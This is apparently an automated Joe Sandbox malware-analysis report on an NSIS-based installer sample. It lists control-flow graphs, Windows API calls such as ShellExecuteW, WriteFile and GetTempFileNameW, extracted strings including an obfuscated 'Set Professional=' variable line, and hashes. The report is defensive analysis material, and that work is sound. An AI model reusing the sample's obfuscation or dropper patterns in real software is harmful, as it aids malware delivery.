                                                                                                                                                                                                                                                                                                      control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00429A95,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      • pAB, xrefs: 004033AB
                                                                                                                                                                                                                                                                                                      • Set Professional=tfcjgLean-Develops-Merchandise-Dp-Begins-Atlantic-Cassette-Teeth-Critics-hyLCandidate-Bias-Max-Finest-Schema-Speaker-CCzWorkshops-His-Stereo-Licensing-uwsAcademy-Prague-Wiring-Innovations-Mirrors-Operating-LmNVHyundai-Broke-Purchases, xrefs: 004033FD
                                                                                                                                                                                                                                                                                                      • ... %d%%, xrefs: 004034C8
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                                      • String ID: ... %d%%$Set Professional=tfcjgLean-Develops-Merchandise-Dp-Begins-Atlantic-Cassette-Teeth-Critics-hyLCandidate-Bias-Max-Finest-Schema-Speaker-CCzWorkshops-His-Stereo-Licensing-uwsAcademy-Prague-Wiring-Innovations-Mirrors-Operating-LmNVHyundai-Broke-Purchases$pAB
                                                                                                                                                                                                                                                                                                      • API String ID: 651206458-4157569052
                                                                                                                                                                                                                                                                                                      • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                      • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                      control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00445D80,00429A95,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(004034E5,00445D80,00429A95,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429A95,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429A95,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                                      • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                      control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                                      • String ID: <RM>$EnabledChuck$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                                                      • API String ID: 247603264-1455960967
                                                                                                                                                                                                                                                                                                      • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                      • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                      control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00429A95,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00429A95,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429A95,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                                      • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                      • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                                      • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                                                      • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                                      • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                      control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                                      • String ID: nsa
                                                                                                                                                                                                                                                                                                      • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                                      • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                      • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                      control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                      • String ID: HideWindow
                                                                                                                                                                                                                                                                                                      • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                                      • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                                      • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                      • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
